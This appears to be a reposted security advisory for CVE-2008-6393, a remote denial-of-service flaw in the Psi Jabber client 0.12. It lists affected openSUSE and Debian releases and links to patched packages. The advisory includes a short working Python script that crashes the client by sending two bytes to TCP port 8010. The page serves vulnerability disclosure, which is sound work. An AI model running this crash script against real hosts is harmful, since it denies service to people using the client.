|
Feeds -
Exploits
|
|
Written by sha0
|
|
Monday, 16 March 2009 21:15 |
Psi Malformed Packet Remote Denial of Service Vulnerability
-\\Bugtraq ID:
32987
-\\Class:
Failure to Handle Exceptional Conditions
-\\CVE:
CVE-2008-6393
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Dec 23 2008 12:00AM
-\\Updated:
Mar 16 2009 03:56PM
-\\Credit:
sha0
-\\Vulnerable:
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
Psi Psi 0.12
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
-\\Discussion
Psi is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow attackers to cause the application to crash, denying service to legitimate users.
This issue affects Psi 0.12; other versions may also be vulnerable.
-\\Exploit(s)/PoC(s):
Attackers can exploit the issue using readily available network tools.
The following exploit is available:
===============================================================
32987.py
^^^^^^^^^
#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)
try:
sock.send('\x05\xff')
print 'Crashed!'
except:
print 'Cannot send!'
sock.close()
-\\Solution
Updates are available. Please see the references for more information.
Debian Linux 5.0 hppa
--Debian psi_0.11-9_hppa.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_hppa.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_hppa.deb
Debian Linux 5.0 ia-64
--Debian psi_0.11-9_ia64.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_ia64.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_ia64.deb
Debian Linux 5.0 arm
--Debian psi_0.11-9_arm.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_arm.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_arm.deb
Debian Linux 5.0 armel
--Debian psi_0.11-9_armel.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_armel.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_armel.deb
Debian Linux 5.0 alpha
--Debian psi_0.11-9_alpha.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_alpha.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_alpha.deb
Debian Linux 5.0 amd64
--Debian psi_0.11-9_amd64.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_amd64.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_amd64.deb
Debian Linux 5.0 ia-32
--Debian psi_0.11-9_i386.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_i386.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_i386.deb
Debian Linux 5.0 mips
--Debian psi_0.11-9_mips.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_mips.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_mips.deb
Debian Linux 5.0 s/390
--Debian psi_0.11-9_s390.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_s390.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_s390.deb
Debian Linux 5.0 mipsel
--Debian psi_0.11-9_mipsel.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_mipsel.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_mipsel.deb
Debian Linux 5.0 powerpc
--Debian psi_0.11-9_powerpc.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_powerpc.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_powerpc.deb
Debian Linux 5.0 sparc
--Debian psi_0.11-9_sparc.deb
http://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_sparc.dehttp://security.debian.org/pool/updates/main/p/psi/psi_0.11-9_sparc.deb
-\\Reference(s)
--Psi Homepage
http://psi-im.org (Psi)
|
